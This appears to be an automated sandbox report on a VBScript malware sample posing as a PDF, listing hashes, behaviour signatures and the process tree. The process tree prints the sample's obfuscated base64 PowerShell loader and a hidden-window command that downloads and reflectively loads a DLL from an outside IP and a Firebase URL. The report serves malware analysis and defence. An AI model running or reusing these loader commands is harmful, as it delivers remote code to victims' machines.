Analysis
-
max time kernel
94s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2024 03:13
Static task
static1
Behavioral task
behavioral1
Sample
RFAU02GSHKOPSFDQW_002_PDF.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
RFAU02GSHKOPSFDQW_002_PDF.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
RV07QAROPHDFSRE_001_PDF_clean.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
RV07QAROPHDFSRE_001_PDF_clean.exe
Resource
win10v2004-20241007-en
General
-
Target
RFAU02GSHKOPSFDQW_002_PDF.vbs
-
Size
222KB
-
MD5
f212536d8cdf98f7284837ee48886346
-
SHA1
7fe473d02fe0dc783b6021c792abca338dc4e11f
-
SHA256
91f8e59475196b2ab33f9e5e22beb04d3ee039985abe1572a4a6e7b3f6f8b74d
-
SHA512
08524a86d5b9f53953e9587286e7210c48ee403e99c67f13dbdd5081a7d558c58541c4e95b6ca640a98a5e5d8a634127801767655b168fa8889357d3319880c6
-
SSDEEP
192:Oply3gSajcsbpS1zQ1QXDebjDqNBft1hx8+W6h8VDvwAv1CjIc:ODokghw1HqR98dfH1Cjj
Malware Config
Extracted
http://20.106.255.48/dll/TESTING.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 4252 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3120 powershell.exe 4252 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3120 powershell.exe 3120 powershell.exe 4252 powershell.exe 4252 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3120 powershell.exe Token: SeDebugPrivilege 4252 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3148 wrote to memory of 3120 3148 WScript.exe 83 PID 3148 wrote to memory of 3120 3148 WScript.exe 83 PID 3120 wrote to memory of 4252 3120 powershell.exe 85 PID 3120 wrote to memory of 4252 3120 powershell.exe 85
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFAU02GSHKOPSFDQW_002_PDF.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DI❤M❤❤u❤DE❤M❤❤2❤C4❤Mg❤1❤DU❤Lg❤0❤Dg❤LwBk❤Gw❤b❤❤v❤FQ❤RQBT❤FQ❤SQBO❤Ec❤LgB0❤Hg❤d❤❤n❤Ck❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤R❤BM❤Ew❤KQ❤u❤Ec❤ZQB0❤FQ❤eQBw❤GU❤K❤❤n❤EY❤aQBi❤GU❤cg❤u❤Eg❤bwBt❤GU❤Jw❤p❤C4❤RwBl❤HQ❤TQBl❤HQ❤a❤Bv❤GQ❤K❤❤n❤FY❤QQBJ❤Cc❤KQ❤u❤Ek❤bgB2❤G8❤awBl❤Cg❤J❤Bu❤HU❤b❤Bs❤Cw❤I❤Bb❤G8❤YgBq❤GU❤YwB0❤Fs❤XQBd❤C❤❤K❤❤n❤DU❤Mg❤1❤Dk❤M❤Bl❤GI❤Yg❤w❤DI❤NQ❤0❤C0❤O❤❤z❤Dc❤OQ❤t❤DQ❤Yg❤1❤DQ❤LQBi❤Dc❤ZgBl❤C0❤Mw❤x❤GI❤YwBh❤GY❤N❤❤2❤D0❤bgBl❤Gs❤bwB0❤CY❤YQBp❤GQ❤ZQBt❤D0❤d❤Bs❤GE❤PwB0❤Hg❤d❤❤u❤D❤❤MgBB❤FI❤RQ❤v❤G8❤LwBt❤G8❤Yw❤u❤HQ❤bwBw❤HM❤c❤Bw❤GE❤Lg❤w❤Dc❤N❤Bm❤GY❤LQBz❤HI❤LwBi❤C8❤M❤B2❤C8❤bQBv❤GM❤LgBz❤Gk❤c❤Bh❤GU❤b❤Bn❤G8❤bwBn❤C4❤ZQBn❤GE❤cgBv❤HQ❤cwBl❤HM❤YQBi❤GU❤cgBp❤GY❤Lw❤v❤Do❤cwBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/TESTING.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('52590ebb0254-8379-4b54-b7fe-31bcaf46=nekot&aidem=tla?txt.02ARE/o/moc.topsppa.074ff-sr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82